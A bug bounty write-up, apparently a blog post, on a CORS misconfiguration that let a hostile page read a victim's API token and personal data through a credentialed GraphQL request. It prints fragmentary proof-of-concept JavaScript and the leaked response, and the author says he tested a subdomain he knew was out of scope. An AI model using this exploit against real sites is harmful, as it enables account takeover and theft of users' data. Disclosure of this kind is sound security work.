Cors Misconfiguration : Steal victim token and PII leads to ATO

Hello Friends .

today i will talk about a bug i found it on July 2020 on Pvt program on HackerOne. the bug named “Cross Origin Resource Sharing Misconfiguration{CORS}”.

1-firstly what is CORS?

Cross-Origin Resource Sharing(CORS) is a mechanism that enables web browsers to perform cross-domain requests using the XMLHttpRequest API in a controlled manner. These cross-origin requests have an Origin header, that identifies the domain initiating the request. It defines the protocol to use between a web browser and a server to determine whether a cross-origin request is allowed.


After reviewing the Program Scope ,I concluded all subdomains are out of scope , just the main domain are In Scope.

3-Steps To Reproduce

Day one : i started hunting in the main domain, i understand how the program services works , also testing bugs but the site is more secure..

Day two : i back to my testing again , when i viewed the Source code i noticed a subdomain in the code named
i know out of scope, but my mind tell test it..
the subdomain do not have a registration page . i can just login with my account on the main domain (SSO)

after login i found this request

he printed PII info on response. Token,email,userinfo…etc
then i noticed the “{Access Control Allow Credentials: true}” so i changed the origin , i deleted and i added and it’s work !

Then i edited the graphql request to steal more info .

4-Exploition Code

<!DOCTYPE html>
function cors_exploit() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML = alert(this.responseText);
};“GET”, “{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
xhttp.withCredentials = true;
<body onload=cors_exploit()>
<h2>Exploiting CORS Vulnerability </h2>
<h3>Extract SID</h3><div id=cors>
<button type=”button” onclick=cors_exploit()> Exploit</button>

Then i uploaded it to my website and it’s work the Data was printed

{ “data”: { “customer”: { “id”: “u285728853”, “username”: “storedthings133776”, “full_name”: null, “email”: “”, “is_admin”: false, “is_premier”: false, “is_premier_parent”: false, “premier_permissions”: [], “user_type”: “core user”, “organization_id”: null, “customer_id”: “285728853”, “hostname”: “”, “token”: “1/eyJjbGllbnRfaWQiOiI3YTE*****************” } }, “extensions”: {} }

5-The Token

The attacker could Access to the victim accounts through the token And perform any actions behalf the victim and view other Endpoints in API


Nov 19th : Report Sent

Nov 20th: Triaged

Nov 20th: rewarded

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

That’s all, thankyou very much for reading it till the last. Hope you would have enjoyed it.

Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store